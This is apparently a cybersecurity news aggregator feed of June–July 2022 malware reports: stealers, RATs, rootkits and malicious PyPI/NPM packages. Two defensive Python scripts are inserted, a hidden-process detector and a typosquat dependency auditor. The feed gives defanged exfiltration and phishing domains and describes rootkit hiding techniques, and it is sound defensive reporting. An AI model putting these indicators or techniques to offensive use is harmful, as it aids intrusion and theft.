Palo Alto Networks Unit 42's analysts assert that the malware was spotted in May 2022 and contains a malicious payload that suggests it was created using a tool called Brute Ratel (BRC4).The Register
July 6, 2022
PennyWise Malware Steals Data from Cryptocurrency Wallets and Browsers Full Text
Abstract
Researchers observed multiple samples of the malware in the wild, making it an active threat. The threat focuses on stealing sensitive browser data and cryptocurrency wallets, and it comes as the Pentagon has raised concerns about the blockchain.Tech Republic
July 6, 2022
Malicious NPM packages used to grab data from apps, websites Full Text
Abstract
Researchers from ReversingLabs discovered tens of malicious NPM packages stealing data from apps and web forms. Researchers from ReversingLabs discovered a couple of dozen NPM packages that included malicious code designed to steal data from apps...Security Affairs
July 5, 2022
ZuoRAT Malware with Hallmarks of a State-Backed Threat Actor Full Text
Abstract
The new ZuoRAT is targeting Small Office/Home Office, or SOHO, routers across North America and Europe, as part of an advanced campaign. An investigation into the case divulged that the trojan can cripple routers from multiple brands, such as ASUS, DrayTek, Cisco, and NETGEAR. For mitigation, ... Cyware Alerts - Hacker News
July 05, 2022
Researchers Uncover Malicious NPM Packages Stealing Data from Apps and Web Forms Full Text
Abstract
A widespread software supply chain attack has targeted the NPM package manager at least since December 2021 with rogue modules designed to steal data entered in forms by users on websites that include them. The coordinated attack, dubbed IconBurst by ReversingLabs, involves no fewer than two dozen NPM packages that include obfuscated JavaScript, which comes with malicious code to harvest sensitive data from forms embedded downstream mobile applications and websites. "These clearly malicious attacks relied on typo-squatting, a technique in which attackers offer up packages via public repositories with names that are similar to — or common misspellings of — legitimate packages," security researcher Karlo Zanki said in a Tuesday report. "Attackers impersonated high-traffic NPM modules like umbrellajs and packages published by ionic.io." The packages in question, most of which were published in the last months, have been collectively downloaded more than 27,000 tThe Hacker News
July 5, 2022
YouTube Creators Accounts are a New Target for YTStealer Malware Full Text
Abstract
A new infostealer, named YTStealer, is targeting content creators on YouTube in an attempt to steal their authentication tokens and take over their accounts. The buyers of the compromised accounts typically use these stolen authentication cookies to hijack YouTube channels for various scams or dema ... Cyware Alerts - Hacker News
July 04, 2022
Some Worms Use Their Powers for Good Full Text
Abstract
Gardeners know that worms are good. Cybersecurity professionals know that worms are bad . Very bad. In fact, worms are literally the most devastating force for evil known to the computing world. The MyDoom worm holds the dubious position of most costly computer malware ever – responsible for some $52 billion in damage. In second place… Sobig , another worm. It turns out, however, that there are exceptions to every rule. Some biological worms are actually not welcome in most gardens. And some cyber worms, it seems, can use their powers for good … Meet Hopper, The Good Worm. Detection tools are not good at catching non-exploit-based propagation , which is what worms do best. Most cybersecurity solutions are less resilient to worm attack methods like token impersonation and others that take advantage of deficient internal configurations - PAM, segmentation, insecure credential storage, and more. So, what better way to beat a stealthy worm than with … another stealthy worm?The Hacker News
July 4, 2022
Raspberry Robin Worm Infects Windows Networks at Technology and Manufacturing Firms Full Text
Abstract
The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.Neowin
July 4, 2022
Revive: New Android malware Posing as 2FA App for a Spanish Bank Full Text
Abstract
A new Revive banking trojan was found targeting users of BBVA, a Spanish financial services company. Revive follows a more focused approach - the bank and not customers as its prime targets. While the malware is in its early developmental stages, it is designed for persistent campaigns. Training em ... Cyware Alerts - Hacker News
July 3, 2022
Microsoft: Raspberry Robin worm already infected hundreds of networks Full Text
Abstract
Microsoft announced that the Windows worm Raspberry Robin has already infected the networks of hundreds of organizations. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary; the malware propagates through removable...Security Affairs
July 02, 2022
Microsoft finds Raspberry Robin worm in hundreds of Windows networks Full Text
Abstract
Microsoft says that a recently spotted Windows worm has been found on the networks of hundreds of organizations from various industry sectors.BleepingComputer
July 01, 2022
Microsoft Warns About Evolving Capabilities of Toll Fraud Android Malware Apps Full Text
Abstract
Microsoft has detailed the evolving capabilities of toll fraud malware apps on Android, pointing out its "complex multi-step attack flow" and an improved mechanism to evade security analysis. Toll fraud belongs to a category of billing fraud wherein malicious mobile applications come with hidden subscription fees, roping in unsuspecting users to premium content without their knowledge or consent. It's also different from other fleeceware threats in that the malicious functions are only carried out when a compromised device is connected to one of its target network operators. "It also, by default, uses cellular connection for its activities and forces devices to connect to the mobile network even if a Wi-Fi connection is available," Dimitrios Valsamaras and Sang Shin Jung of the Microsoft 365 Defender Research Team said in an exhaustive analysis. "Once the connection to a target network is confirmed, it stealthily initiates a fraudulent subscriptionThe Hacker News
July 1, 2022
SessionManager Backdoor employed in attacks on Microsoft IIS servers worldwide Full Text
Abstract
Researchers warn of a new 'SessionManager' Backdoor that was employed in attacks targeting Microsoft IIS Servers since March 2021. Researchers from Kaspersky Lab have discovered a new 'SessionManager' Backdoor that was employed in attacks targeting...Security Affairs
July 01, 2022
New ‘SessionManager’ Backdoor Targeting Microsoft IIS Servers in the Wild Full Text
Abstract
A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022. Dubbed SessionManager , the malicious tool masquerades as a module for Internet Information Services ( IIS ), a web server software for Windows systems, after exploiting one of the ProxyLogon flaws within Exchange servers. Targets included 24 distinct NGOs, government, military, and industrial organizations spanning Africa, South America, Asia, Europe, Russia and the Middle East. A total of 34 servers have been compromised by a SessionManager variant to date. This is far from the first time the technique has been observed in real-world attacks . The use of a rogue IIS module as a means to distribute stealthy implants has its echoes in an Outlook credential stealer called Owowa that came to light in December 2021. "Dropping an IIS module aThe Hacker News
July 1, 2022
Microsoft Warns of Toll Fraud Malware on Android That Switches Off Wi-Fi, Empties Users’ Wallets Full Text
Abstract
Microsoft explains in a blogpost that WAP fraud malware on Android is capable of targeting users of specific network operators and uses dynamic code loading -- a method for hiding malicious behavior.ZDNet
June 30, 2022
Toll fraud malware disables your WiFi to force premium subscriptions Full Text
Abstract
Microsoft is warning that toll fraud malware is one of the most prevalent threats on Android and that it is evolving with features that allow automatic subscription to premium services.BleepingComputer
June 30, 2022
Microsoft Exchange servers worldwide backdoored with new malware Full Text
Abstract
A newly discovered lightweight and persistent malware was used by attackers to backdoor Microsoft Exchange servers belonging to government and military organizations from Europe, the Middle East, Asia, and Africa.BleepingComputer
June 30, 2022
Microsoft Warns of New Updated ‘8220’ Linux Malware that Installs Cryptominers Full Text
Abstract
Microsoft has called out recent work from the so-called "8220 gang" group, which has recently been spotted exploiting the critical bug affecting Atlassian Confluence Server and Data Center, tracked as CVE-2022-26134.ZDNet
June 30, 2022
YTStealer info-stealing malware targets YouTube content creators Full Text
Abstract
Researchers detailed a new information-stealing malware, dubbed YTStealer, that targets YouTube content creators. Intezer cybersecurity researchers have detailed a new information-stealing malware, dubbed YTStealer, that was developed to steal authentication...Security Affairs
June 30, 2022
XFiles info-stealing malware adds support for Follina delivery Full Text
Abstract
The XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers.BleepingComputer
June 29, 2022
PyPi Packages Caught Stealing and Making AWS Keys and More Public Full Text
Abstract
Malicious Python packages in the PyPI repository steal sensitive data before sending it to publicly exposed endpoints. The sensitive data includes AWS credentials as well as environment variables. The stolen data is stored in TXT files and uploaded to a PyGrata[.]com domain. The endpoin ... Cyware Alerts - Hacker News
June 29, 2022
New YTStealer Malware Aims to Hijack Accounts of YouTube Content Creators Full Text
Abstract
Cybersecurity researchers have documented a new information-stealing malware that targets YouTube content creators by plundering their authentication cookies. Dubbed "YTStealer" by Intezer, the malicious tool is likely believed to be sold as a service on the dark web, with it distributed using fake installers that also drop RedLine Stealer and Vidar. "What sets YTStealer aside from other stealers sold on the dark web market is that it is solely focused on harvesting credentials for one single service instead of grabbing everything it can get ahold of," security researcher Joakim Kenndy said in a report shared with The Hacker News. The malware's modus operandi, however, mirrors its counterparts in that it extracts the cookie information from the web browser's database files in the user's profile folder. The reasoning given behind targeting content creators is that it uses one of the installed browsers on the infected machine to gather YouTube channelThe Hacker News
June 29, 2022
New YTStealer malware steals accounts from YouTube Creators Full Text
Abstract
A new information-stealing malware named YTStealer is targeting YouTube content creators and attempting to steal their authentication tokens and hijack their channels.BleepingComputer
June 29, 2022
Keona Clipper Steals Cryptocurrency Payments Full Text
Abstract
Keona Clipper, a new malware threat, is stealing cryptocurrencies from infected computers by replacing the user wallet address with its own. It leverages Telegram to stay hidden. Researchers identified over 90 different iterations of Keona since May, indicating wide deployment. Users should take utm ... Cyware Alerts - Hacker News
June 29, 2022
Raccoon Stealer Reappears With a New Version Full Text
Abstract
Raccoon Stealer v2 is written in C/C++ using WinApi. The malware downloads legitimate third-party DLLs from its C2 servers. It is believed that the new version was available on Telegram for sale since May 17.Cyware Alerts - Hacker News
June 28, 2022
ZuoRAT malware hijacks SOHO routers to spy on the victims Full Text
Abstract
A new RAT dubbed ZuoRAT was employed in a campaign aimed at small office/home office (SOHO) routers in North America and Europe. Researchers from Black Lotus Labs, the threat intelligence division of Lumen Technologies, have discovered a new remote...Security Affairs
June 28, 2022
ZuoRAT Malware Hijacking Home-Office Routers to Spy on Targeted Networks Full Text
Abstract
A never-before-seen remote access trojan dubbed ZuoRAT has been singling out small office/home office (SOHO) routers as part of a sophisticated campaign targeting North American and European networks. The malware "grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold," researchers from Lumen Black Lotus Labs said in a report shared with The Hacker News. The stealthy operation, which targeted routers from ASUS, Cisco, DrayTek, and NETGEAR, is believed to have commenced in early 2020 during the initial months of the COVID-19 pandemic, effectively remaining under the radar for over two years. "Consumers and remote employees routinely use SOHO routers, but these devices are rarely monitored or patched, which makes them one of the weakest points of a network's perimeter," the company's threat intelligence team said. Initial accessThe Hacker News
June 28, 2022
New ZuoRAT malware targets SOHO routers in North America, Europe Full Text
Abstract
A newly discovered multistage remote access trojan (RAT) dubbed ZuoRAT has been used to target remote workers via small office/home office (SOHO) routers across North America and Europe undetected since 2020.BleepingComputer
June 28, 2022
New Android Banking Trojan ‘Revive’ Targeting Users of Spanish Financial Services Full Text
Abstract
A previously unknown Android banking trojan has been discovered in the wild, targeting users of the Spanish financial services company BBVA. Said to be in its early stages of development, the malware — dubbed Revive by Italian cybersecurity firm Cleafy — was first observed on June 15, 2022 and distributed by means of phishing campaigns. "The name Revive has been chosen since one of the functionality of the malware (called by the [threat actors] precisely 'revive') is restarting in case the malware stops working," Cleafy researchers Federico Valentini and Francesco Iubatti said in a Monday write-up. Available for download from rogue phishing pages ("bbva.appsecureguide[.]com" or "bbva.european2fa[.]com") as a lure to trick users into downloading the app, the malware impersonates the bank's two-factor authentication (2FA) app and is said to be inspired from open-source spyware called Teardroid , with the authors tweaking the original source cThe Hacker News
June 28, 2022
Raccoon Stealer is back with a new version to steal your passwords Full Text
Abstract
The Raccoon Stealer malware is back with a second major version circulating on cybercrime forums, offering hackers elevated password-stealing functionality and upgraded operational capacity.BleepingComputer
June 27, 2022
Android malware ‘Revive’ impersonates BBVA bank’s 2FA app Full Text
Abstract
A new Android banking malware named Revive has been discovered that impersonates a 2FA application required to log into BBVA bank accounts in Spain.BleepingComputer
June 27, 2022
Ukrainian telecommunications operators hit by DarkCrystal RAT malware Full Text
Abstract
The Ukrainian CERT-UA warns of attacks against Ukrainian telecommunications operators involving the DarkCrystal RAT. The Governmental Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a malware campaign targeting Ukrainian telecommunications...Security Affairs
June 27, 2022
Researchers Warn of ‘Matanbuchus’ Malware Campaign Dropping Cobalt Strike Beacons Full Text
Abstract
A malware-as-a-service (MaaS) dubbed Matanbuchus has been observed spreading through phishing campaigns, ultimately dropping the Cobalt Strike post-exploitation framework on compromised machines. Matanbuchus, like other malware loaders such as BazarLoader , Bumblebee , and Colibri , is engineered to download and execute second-stage executables from command-and-control (C&C) servers on infected systems without detection. Available on Russian-speaking cybercrime forums for a price of $2,500 since February 2021, the malware is equipped with capabilities to launch .EXE and .DLL files in memory and run arbitrary PowerShell commands. The findings, released by threat intelligence firm Cyble last week, document the latest infection chain associated with the loader, which is linked to a threat actor who goes by the online moniker BelialDemon. "If we look historically, BelialDemon has been involved in the development of malware loaders," Unit 42 researchers Jeff WhiteThe Hacker News
June 26, 2022
CopperStealer Malware is Spreading Through Fake Cracks Full Text
Abstract
Trend Micro observed a new CopperStealer malware variant propagated via websites offering fake cracks. The malware has resorted to using platforms such as Telegram. Google Chrome, Microsoft Edge, Mozilla Firefox, Opera, and Yandex are among the browsers from which the malware can steal Facebook-rel ... Cyware Alerts - Hacker News
June 25, 2022
New Activities of RIG Exploit Kit Observed Full Text
Abstract
RIG is one of the actively used exploit kits to distribute a variety of malware. First spotted in 2014, the kit has a unique capability to merge with different web technologies such as VB Script, Flash, and DoSWF to evade detection.Cyware Alerts - Hacker News
June 25, 2022
PyPi python packages caught sending stolen AWS keys to unsecured sites Full Text
Abstract
Multiple malicious Python packages available on the PyPI repository were caught stealing sensitive information like AWS credentials and transmitting it to publicly exposed endpoints accessible by anyone.BleepingComputer
June 25, 2022
This new malware diverts cryptocurrency payments to attacker-controlled wallets Full Text
Abstract
Researchers from Cyble have analyzed a new malware dubbed Keona Clipper that aims to steal cryptocurrencies from infected computers and uses Telegram to increase its stealth.Tech Republic
June 25, 2022
Multiple malicious packages in PyPI repository found stealing AWS secrets Full Text
Abstract
Researchers discovered multiple malicious Python packages in the official PyPI repository stealing AWS credentials and other info. Sonatype researchers discovered multiple Python packages in the official PyPI repository that have been developed to steal...Security Affairs
June 24, 2022
Multiple Backdoored Python Libraries Caught Stealing AWS Secrets and Keys Full Text
Abstract
Researchers have discovered a number of malicious Python packages in the official third-party software repository that are engineered to exfiltrate AWS credentials and environment variables to a publicly exposed endpoint. The list of packages includes loglib-modules, pyg-modules, pygrata, pygrata-utils, and hkg-sol-utils, according to Sonatype security researcher Ax Sharma. The packages as well as the endpoint have now been taken down. "Some of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job," Sharma said . The malicious code injected into "loglib-modules" and "pygrata-utils" allows it to harvest AWS credentials, network interface information, and environment variables and export them to a remote endpoint: "hxxp://graph.pygrata[.]com:8000/upload." Troublingly, the endpoints hosting this information in the form of hundreds of .TXT files were not secured by anyThe Hacker News
June 23, 2022
New ‘Quantum’ Builder Lets Attackers Easily Create Malicious Windows Shortcuts Full Text
Abstract
A new malware tool that enables cybercriminal actors to build malicious Windows shortcut ( .LNK ) files has been spotted for sale on cybercrime forums. Dubbed Quantum Lnk Builder , the software makes it possible to spoof any extension and choose from over 300 icons, not to mention support UAC and Windows SmartScreen bypass as well as "multiple payloads per .LNK" file. Also offered are capabilities to generate .HTA and disk image (.ISO) payloads. Quantum Builder is available for lease at different price points: €189 a month, €355 for two months, €899 for six months, or as a one-off lifetime purchase for €1,500. ".LNK files are shortcut files that reference other files, folders, or applications to open them," Cyble researchers said in a report. "The [threat actor] leverages the .LNK files and drops malicious payloads using LOLBins [living-off-the-land binaries]." Early evidence of malware samples using Quantum Builder in the wild is said to daThe Hacker News
June 23, 2022
AvosLocker Adopts a Mix of Commercial Tools and Malicious Payloads Full Text
Abstract
The attackers have used Cobalt Strike, Sliver, and several commercially available network scanners. They targeted an ESXi server exposed over VMWare Horizon UAG by exploiting the Log4Shell flaw.Cyware Alerts - Hacker News
June 23, 2022
New Activities of RIG Exploit Kit Observed Full Text
Abstract
According to Bitdefender researchers, the operators behind the RIG exploit kit have swapped the Raccoon Stealer malware with Dridex trojan as part of an ongoing campaign that commenced in January 2021.Cyware Alerts - Hacker News
June 21, 2022
RIG Exploit Kit Now Infects Victims’ PCs With Dridex Instead of Raccoon Stealer Full Text
Abstract
The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022. The switch in modus operandi, spotted by Romanian company Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022. The Rig Exploit Kit is notable for its abuse of browser exploits to distribute an array of malware. First spotted in 2019, Raccoon Stealer is a credential-stealing trojan that's advertised and sold on underground forums as a malware-as-a-service (MaaS) for $200 a month. That said, the Raccoon Stealer actors are already working on a second version that's expected to be "rewritten from scratch and optimized." But the void left by the malware's exit is being filled by other information stealers such as RedLine Stealer and Vidar.The Hacker News
June 20, 2022
BRATA Android Malware evolves and targets the UK, Spain, and Italy Full Text
Abstract
The developers behind the BRATA Android malware have implemented additional features to avoid detection. The operators behind the BRATA Android malware have implemented more features to make their attacks stealthy. The malware was first...Security Affairs
June 19, 2022
BRATA Android Malware Gains Advanced Mobile Threat Capabilities Full Text
Abstract
The operators behind BRATA have once again added more capabilities to the Android mobile malware in an attempt to make their attacks against financial apps more stealthy. "In fact, the modus operandi now fits into an Advanced Persistent Threat (APT) activity pattern," Italian cybersecurity firm Cleafy said in a report last week. "This term is used to describe an attack campaign in which criminals establish a long-term presence on a targeted network to steal sensitive information." An acronym for "Brazilian Remote Access Tool Android," BRATA was first detected in the wild in Brazil in late 2018, before making its first appearance in Europe last April, while masquerading as antivirus software and other common productivity tools to trick users into downloading them. The change in the attack pattern, which scaled new highs in early April 2022, involves tailoring the malware to strike a specific financial institution at a time, switching to a differeThe Hacker News
June 19, 2022
Android-wiping BRATA malware is evolving into a persistent threat Full Text
Abstract
The threat actors operating the BRATA banking trojan have evolved their tactics and incorporated new information-stealing features into their malware.BleepingComputer
June 18, 2022
New IceXLoader 3.0 – Developers Warm Up to Nim Full Text
Abstract
The latest version is written in Nim, a relatively new language utilized by threat actors over the past two years, most notably by the NimzaLoader variant of BazarLoader used by the TrickBot group.Fortinet
June 16, 2022
New MaliBot Android banking malware spreads as a crypto miner Full Text
Abstract
Threat analysts have discovered a new Android malware strain named MaliBot, which poses as a cryptocurrency mining app or the Chrome web browser to target users in Italy and Spain.BleepingComputer
June 16, 2022
RedLine Stealer Returns in a New Campaign Full Text
Abstract
It spreads via fake software imitating legitimate cryptocurrency or NFT wallet applications such as Gigaland NFT marketplace and Dinox (NFT-themed collectible game) to lure users.Cyware Alerts - Hacker News
June 16, 2022
Malicious apps continue to spread through the Google Play Store Full Text
Abstract
Researchers at antivirus firm Dr. Web discovered malware in the Google Play Store that was downloaded two million times. An investigation conducted by the antivirus firm Dr. Web in May resulted in the discovery of multiple adware and information-stealing...Security Affairs
June 15, 2022
MaliBot: A New Android Banking Trojan Spotted in the Wild Full Text
Abstract
A new strain of Android malware has been spotted in the wild targeting online banking and cryptocurrency wallet customers in Spain and Italy, just weeks after a coordinated law enforcement operation dismantled FluBot . The information stealing trojan, codenamed MaliBot by F5 Labs, is as feature-rich as its counterparts , allowing it to steal credentials and cookies, bypass multi-factor authentication (MFA) codes, and abuse Android's Accessibility Service to monitor the victim's device screen. MaliBot is known to primarily disguise itself as cryptocurrency mining apps such as Mining X or The CryptoApp that are distributed via fraudulent websites designed to attract potential visitors into downloading them. It also takes another leaf out of the mobile banking trojan playbook in that it employs smishing as a distribution vector to proliferate the malware by accessing an infected smartphone's contacts and sending SMS messages containing links to the malware. "MalThe Hacker News
June 15, 2022
PureCrypter Loader Updated with New Modules Full Text
Abstract
Written in .NET language and obfuscated with SmartAssembly, the loader makes use of compression and encryption to evade detection by antivirus software. It first appeared in March 2021 and has since been put for sale at a price of $59.Cyware Alerts - Hacker News
June 14, 2022
Android malware on the Google Play Store gets 2 million downloads Full Text
Abstract
Cybersecurity researchers have discovered adware and information-stealing malware on the Google Play Store last month, with at least five still available and having amassed over two million downloads.BleepingComputer
June 14, 2022
Industroyer: A cyber‑weapon that brought down a power grid Full Text
Abstract
On June 12, 2017, ESET researchers published their findings about a malware that was capable of causing a widespread blackout. Industroyer, as they named it, was the first known piece of malware that was developed specifically to target a power grid.ESET Security
June 14, 2022
Experts spotted Syslogk, a Linux rootkit under development Full Text
Abstract
Researchers from antivirus firm Avast spotted a new Linux rootkit, dubbed ‘Syslogk,’ that uses specially crafted "magic packets" to activate a dormant backdoor on the device...Security Affairs
June 14, 2022
New Syslogk Linux Rootkit Lets Attackers Remotely Command It Using “Magic Packets” Full Text
Abstract
A new covert Linux kernel rootkit named Syslogk has been spotted under development in the wild and cloaking a malicious payload that can be remotely commandeered by an adversary using a magic network traffic packet. "The Syslogk rootkit is heavily based on Adore-Ng but incorporates new functionalities making the user-mode application and the kernel rootkit hard to detect," Avast security researchers David Álvarez and Jan Neduchal said in a report published Monday. Adore-Ng, an open-source rootkit available since 2004, equips the attacker with full control over a compromised system. It also facilitates hiding processes as well as custom malicious artifacts, files, and even the kernel module, making it harder to detect. "The module starts by hooking itself into various file systems. It digs up the inode for the root filesystem, and replaces that inode's readdir() function pointer with one of its own," LWN.net noted at the time. "The Adore verThe Hacker News
June 13, 2022
Three PyPI Packages Found Including Password Stealer by Mistake Full Text
Abstract
Three PyPI packages were found to contain a backdoor due to a malicious dependency in certain versions, exposing users to supply chain attacks. The risk from the ‘keep’ package is particularly high because it averages over 8,000 downloads per week. Even if P ... Read MoreCyware Alerts - Hacker News
June 13, 2022
Metasploit 6.2.0 improves credential theft, SMB support features, more Full Text
Abstract
Metasploit 6.2.0 has been released with 138 new modules, 148 new improvements/features, and 156 bug fixes since version 6.1.0 was released in August 2021.BleepingComputer
June 13, 2022
New Syslogk Linux rootkit uses magic packets to trigger backdoor Full Text
Abstract
A new rootkit malware named 'Syslogk' has been spotted in the wild, and it features advanced process and file hiding techniques that make detection highly unlikely.BleepingComputer
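The three Syslogk entries above all turn on the Adore-Ng technique of replacing the readdir() pointer so that a process vanishes from /proc listings. The classic counter is a cross-view check: the kernel still answers direct lookups (kill(pid, 0), open("/proc/<pid>/status")) for a PID that readdir() no longer returns. The script below is an added example, not code from the Avast or LWN write-ups; it assumes a Linux host and that the rootkit hooks only directory listing, not the lookup path.

```python
"""Cross-view check for processes hidden from /proc listings.

Added example; not code from Avast's Syslogk report or from LWN.  Assumes a
Linux host where an Adore-Ng-style readdir() hook hides a PID from directory
listings while direct lookups still succeed.
"""
import os
from typing import Callable, Iterable, List, Set


def list_visible_pids() -> Set[int]:
    """Listing view: what readdir() on /proc returns (what `ps` and `ls` see)."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def pid_exists(pid: int) -> bool:
    """Lookup view: kill(pid, 0) delivers no signal but reports whether the
    PID (or thread ID) is alive.  EPERM still means 'exists'."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def is_thread_group_leader(pid: int) -> bool:
    """kill(tid, 0) also succeeds for thread IDs, which are never listed in
    /proc, so read Tgid from /proc/<pid>/status to skip them.  If the status
    file is missing for a live PID, keep it as a candidate."""
    try:
        with open(f"/proc/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        pass
    return True


def find_hidden_pids(
    visible: Iterable[int],
    exists: Callable[[int], bool],
    leader: Callable[[int], bool],
    max_pid: int,
) -> List[int]:
    """PIDs that answer a direct probe but are absent from the listing.
    The probes are injected so the logic can be exercised without root or a
    rootkit present."""
    seen = set(visible)
    return sorted(
        pid for pid in range(1, max_pid + 1)
        if pid not in seen and exists(pid) and leader(pid)
    )


def scan_live_host() -> List[int]:
    """Run the check against the real kernel (Linux only; probing every PID up
    to pid_max takes a few seconds in Python)."""
    with open("/proc/sys/kernel/pid_max") as fh:
        max_pid = int(fh.read())
    before = list_visible_pids()
    candidates = find_hidden_pids(before, pid_exists, is_thread_group_leader, max_pid)
    after = list_visible_pids()  # second listing drops processes spawned mid-scan
    return [pid for pid in candidates if pid not in after]


if __name__ == "__main__":
    hidden = scan_live_host()
    print("hidden PIDs:", hidden or "none")
```

Run it as root on the suspect host, ideally from a statically linked Python or a rescue image, since a kernel module that also hooks kill() or the /proc lookup path would defeat this particular view pair; a PID that shows up here should then be inspected offline via /proc/<pid>/exe and /proc/<pid>/maps.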
June 12, 2022
PyPI package ‘keep’ mistakenly included a password stealer Full Text
Abstract
PyPI packages 'keep,' 'pyanxdns,' 'api-res-py' were found to contain a password-stealer and a backdoor due to the presence of malicious 'request' dependency within some versions.BleepingComputer
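The two 'keep' entries above hinge on a dependency named 'request' that reads like the popular 'requests'. The audit below is an added example, not code from BleepingComputer or Cyware: it normalises every declared dependency under PEP 503 rules and reports any name that is one edit away from a watch-list of widely used packages without being equal to it. The watch-list, the sample METADATA and the sample requirements.txt are constructed for the example.

```python
"""Flag look-alike dependency names in Python package metadata.

Added example; not from the BleepingComputer or Cyware write-ups.  WATCHLIST,
SAMPLE_METADATA and SAMPLE_REQUIREMENTS are constructed for illustration.
"""
import re
from typing import Dict, Iterable, List, Set

# Constructed watch-list; a real audit would load the top-N names from the index.
WATCHLIST: Set[str] = {
    "requests", "urllib3", "click", "python-dateutil", "numpy",
    "setuptools", "pyyaml", "cryptography", "colorama", "six",
}

SAMPLE_METADATA = """\
Metadata-Version: 2.1
Name: keep
Version: 1.2
Requires-Dist: request (>=1.0)
Requires-Dist: click
Requires-Dist: python_dateutil; python_version >= "3.6"
"""

SAMPLE_REQUIREMENTS = """\
# constructed requirements.txt
requests==2.28.0
urlib3>=1.26
-r base.txt
Numpy
"""

_NAME_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of '-', '_', '.'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_metadata(text: str) -> List[str]:
    """Dependency names from Requires-Dist lines of a dist-info METADATA file."""
    names = []
    for line in text.splitlines():
        if line.startswith("Requires-Dist:"):
            m = _NAME_RE.match(line[len("Requires-Dist:"):])
            if m:
                names.append(m.group(1))
    return names


def parse_requirements(text: str) -> List[str]:
    """Dependency names from a requirements.txt (comments and options skipped)."""
    names = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "-")):
            continue
        m = _NAME_RE.match(line)
        if m:
            names.append(m.group(1))
    return names


def within_one_edit(a: str, b: str) -> bool:
    """True if a != b and one insertion, deletion, substitution or adjacent
    transposition turns a into b (Damerau-Levenshtein distance exactly 1)."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) == len(b):
        diff = [i for i, (x, y) in enumerate(zip(a, b)) if x != y]
        if len(diff) == 1:
            return True
        return (len(diff) == 2 and diff[1] == diff[0] + 1
                and a[diff[0]] == b[diff[1]] and a[diff[1]] == b[diff[0]])
    short, long_ = (a, b) if len(a) < len(b) else (b, a)
    return any(long_[:i] + long_[i + 1:] == short for i in range(len(long_)))


def audit(names: Iterable[str], watchlist: Set[str] = WATCHLIST) -> Dict[str, str]:
    """Map each look-alike dependency to the watch-list name it resembles."""
    findings: Dict[str, str] = {}
    for raw in names:
        n = normalize(raw)
        if n in watchlist:
            continue  # exact (normalised) match with a known-good name
        for popular in sorted(watchlist):
            if within_one_edit(n, popular):
                findings[raw] = popular
                break
    return findings


if __name__ == "__main__":
    print(audit(parse_metadata(SAMPLE_METADATA)))
    print(audit(parse_requirements(SAMPLE_REQUIREMENTS)))
```

Point parse_metadata at each site-packages/*.dist-info/METADATA file to audit what is actually installed rather than what the top-level requirements say; a transitive dependency, as in the 'keep' case, only shows up there.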
June 11, 2022
Emotet Goes After Google Chrome Users to Steal Credit Card Details Full Text
Abstract
Emotet was found dropping a new module to pilfer credit card information stored in the Chrome web browser. During April, Emotet malware activity increased, and one week later, it began using Windows shortcut files (.LNK) to execute PowerShell commands on victims' devices.Cyware Alerts - Hacker News
June 11, 2022
PoC Exploits for Atlassian RCE Bug Exploit Released Online Full Text
Abstract
Proof-of-concept exploits for the actively exploited critical CVE-2022-26134 vulnerability impacting Atlassian Confluence Server and Data Center are out. The vulnerability can be exploited by an unauthenticated threat actor to achieve remote code execution, which can lead to a total domain takeover. However, this vulne ... Read MoreCyware Alerts - Hacker News
June 10, 2022
New Variant of Black Basta Targets VMware ESXi Servers Full Text
Abstract
The Black Basta ransomware developed a Linux version that is now targeting VMware ESXi servers. The updated version allows faster encryption of multiple servers with a single command. Recently, the ransomware group joined hands with QBot to move laterally across the victim's network. Organizations ... Read MoreCyware Alerts - Hacker News
June 10, 2022
Emotet Banking Trojan Resurfaces, Skating Past Email Security Full Text
Abstract
"The attacks are using hijacked email threads and then using those accounts as a launch point to trick victims into enabling macros of attached malicious office documents," a Thursday report from Deep Instinct explained.Dark Reading
June 9, 2022
Symbiote, a nearly-impossible-to-detect Linux malware Full Text
Abstract
Joint research by security firms Intezer and BlackBerry uncovered a highly stealthy Linux malware, dubbed Symbiote, that could be used to backdoor infected systems. The name comes...Security Affairs
June 09, 2022
Symbiote: A Stealthy Linux Malware Targeting Latin American Financial Sector Full Text
Abstract
Cybersecurity researchers have taken the wraps off what they call a "nearly-impossible-to-detect" Linux malware that could be weaponized to backdoor infected systems. Dubbed Symbiote by threat intelligence firms BlackBerry and Intezer, the stealthy malware is so named for its ability to conceal itself within running processes and network traffic and drain a victim's resources like a parasite. The operators behind Symbiote are believed to have commenced development on the malware in November 2021, with the threat actor predominantly using it to target the financial sector in Latin America, including banks like Banco do Brasil and Caixa. "Symbiote's main objective is to capture credentials and to facilitate backdoor access to a victim's machine," researchers Joakim Kennedy and Ismael Valenzuela said in a report shared with The Hacker News. "What makes Symbiote different from other Linux malware is that it infects running processes rather thanThe Hacker News
June 09, 2022
New Symbiote malware infects all running processes on Linux systems Full Text
Abstract
Threat analysts have discovered a new malware targeting Linux systems that operates as a symbiote in the host, blending perfectly with running processes and network traffic to steal account credentials and give its operators backdoor access.BleepingComputer
June 9, 2022
New Emotet variant uses a module to steal data from Google Chrome Full Text
Abstract
